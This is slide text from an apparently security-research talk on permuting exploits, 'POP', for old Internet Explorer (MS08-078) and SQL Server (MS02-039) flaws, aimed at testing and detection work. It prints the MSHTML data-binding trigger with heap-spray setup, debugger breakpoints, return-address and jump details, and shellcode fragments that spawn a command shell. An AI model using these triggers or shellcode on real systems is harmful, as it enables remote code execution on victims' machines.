    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::RemoveBinding DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 _MemFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 HeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlFreeHeap DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlpLowFragHeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplAry::Delete DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::Detach DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode ecx (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t 0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t DATAFLD 0a0a0a Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATAFLD 0x0a0a0a0a Exploitation shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
    • MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
    • MS08-078 Breakingpoints bp mshtml!CElement::GetAAdataFld bp mshtml!CElement::GetAAdataSrc bp mshtml!CCurrentRecordConsumer::Bind bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance bp mshtml!CXfer::CreateBinding bp mshtml!CXfer::TransferFromSrc bp mshtml!CXfer::Detach bp mshtml!CRecordInstance::CRecordInstance bp mshtml!CRecordInstance::AddBinding bp mshtml!CRecordInstance::TransfertoDestination bp mshtml!CRecordInstance::RemoveBinding bp mshtml!CRecordInstance::Detach bp mshtml!CRecordInstance::~CRecordInstance bp mshtml!CImplPtrAry::Append bp mshtml!CImplPtrAry::Delete bp _MemFree bp kernel32!HeapFree bp ntdll!RtlFreeHeap bp ntdll!RtlpLowFragHeapFree
    • Approach UnconditionalVulnerability Complete (YES) Incomplete (NO) Vulnerable Documentation? Document Alternatives? Ecosystem Reverse Reversing? Alternatives? Alternatives Engineer Obfuscation Exploitation Arbitrary codeAlternatives Detection Attack detection Alternatives? Permutation OP
    • MS02-039 POPed• SQL Request: • JUMP: – CLNT_UCAST_INST (0x04). – Unconditional JUMP short, relative, and forward to REL8.• SQL INSTANCENAME: – There are 115 possible values to REL8. – ASCII hexa values from 0x01 to 0xff, except: – 115 permutations. 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c. – 24,000 permutations. • Writable address and memory alignment: – There are 26,758 new writable addresses within• Return address: SQLSORT.DLL (Microsoft SQL Server 2000 – Uses the “jump to register” technique, in this SP0/SP1/SP2). There are much more writable case the ESP register. addresses if do not mind making it hardcoded. – There are four (4) new possible return addresses – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and within SQLSORT.DLL (Microsoft SQL Server “OlyDBG 2.01 alpha 2” by Oleh Yuschuk. 2000 SP0/SP1/SP2). There are much more return – 26,758 permutations. addresses if do not mind making it hardcoded. – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking • Padding and memory alignment: Proof your Network – Second Edition”, 2002), – ASCII hexa values from 0x01 to 0xff. and “DumpOp.c” by Koskya Kortchinsky (“Macro – The length may vary, depending on JUMP, from reliability in Win32 Exploits” – Black Hat Europe, 3,048 to 29,210 possibilities. 2007). – 29,210 permutations. – 4 permutations.
    • MS08-078 POPed
    • MS08-078 POPed
    • MS08-078 POPed• CVE-2008-4844: “…crafted XML document • Data Consumer (HTML elements): containing nested <SPAN> elements”? I do not – According to MSDN (“Binding HTML think so… Elements to Data”) there are, at least, fifteen (15) bindable HTML elements• XML Data Island: available, but only five (5) elements are – There are two (2) options: using the useful. Dynamic HTML (DHTML) <XML> element – The HTML element is a key trigger, because within the HTML document or overloading it points to a dereferenced XML DSO, but the HTML <SCRIPT> element. it does not have to be the same HTML – Unfortunately, the HTML <SCRIPT> element to do so – it can be any mixed element is useless. HTML element. – But there are three (03) new alternatives to – 25 permutations. embedded a DSO. – 4 permutations. • Return address: – Uses “Heap Spray” technique, in this case• XML Data Source Object (DSO): the XML DSO handles the return address, and can use “.NET DLL” technique by Mark – Characters like “<” and “&” are illegal in Dowd and Alexander Sotirov (“How to <XML> element. To avoid errors <XML> Impress Girls with Browser Memory element can be defined as CDATA Protection Bypasses” – Black Hat USA, (Unparsed Character Data). But the <XML> 2008). element can be also defined as “&lt;” instead of “<”. – There are, at least, four (4) new possible return addresses. – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO. – 4 permutations. – 4 permutations.
    • ShellcodeRegular Hadoken (波動拳)shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
    • ShellcodeRegular Hadoken (波動拳)shell: shell: push 0x00646D63 call shell_set_cmd mov ebx, esp db “CMD /k”, 0 push edi shell_set_cmd: push edi pop ebx push edi push edi xor esi, esi push edi push byte 18 push edi pop ecx xor esi, esi push byte 18 Code by Stephen Fewer (Harmony Security) and part pop ecx of Metasploit Framework. Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7). Demonstrated on H2HC 6th Edition (2009).
    • ShellcodeShoryuken (昇龍拳) FPU GetPCshell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2.shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
    • ShellcodeShoryuken (昇龍拳) FPU GetPCshell: fnstenv_getpc PROC call shell_set_cmd ; Could be fld1, fldl2t, fldl2e, db “CMD /k set DIRCMD=/b”, 0 ; fldz, fldlg2 or fldln2.shell_set_cmd: pop ebx fldpi push edi fnstenv [esp - 0Ch] push edi pop eax push edi add byte ptr [eax], 0Ah xor esi, esi assembly: push byte 18 pop ecx fnstenv_getpc ENDP Ideas by sk (SCAN Associates Berhad), and published Ideas by Aaron Adams, and published on VULN-DEV on Phrack Magazine (issue 62, file 7). (November 18th, 2003). Demonstrated on H2HC 6th Edition (2009). Demonstrated on H2HC 6th Edition (2009).
    • What demo? NO DEMONSTRATIONBut you can test by yourselves!!!
    • What demo?
    • Conclusions• Some examples, applying POP technique, will be • The POP technique is not part of any commercial or available. For further details, please refer to: public tool and is freely available, although the – http://about.me/nbrito examples were ported to work with Rapid7 Metasploit Framework – this is to show how flexible its approach and deployment is – hoping it can help people to• POP examples are licensed under GNU General understand the threat, improving their infra- Public License version 2. structure, security solutions and development approach.• The examples cover pretty old vulnerabilities, such as: – MS02-039: 3,307 days since published. • POP technique can be freely applied, there are no – MS02-056: 3,237 days since published. restrictions… No other than laziness. – MS08-078: 969 days since published. – MS09-002: 914 days since published. • POP technique can help different people, performing different tasks, such as:• POP is also not new: – Penetration-testing. – Encore-NG: 1,056 days since BUGTRAQ and – Exploit and proof-of-concept tools FULL-DISCLOSURE. development. – ENG++ : 622 days since H2HC 6th Edition. – Security solutions evaluation and tests. – Security solution Quality -Assurance . – Detection and protection mechanisms development. – Etc…
    • Any questions?
    • Any questions?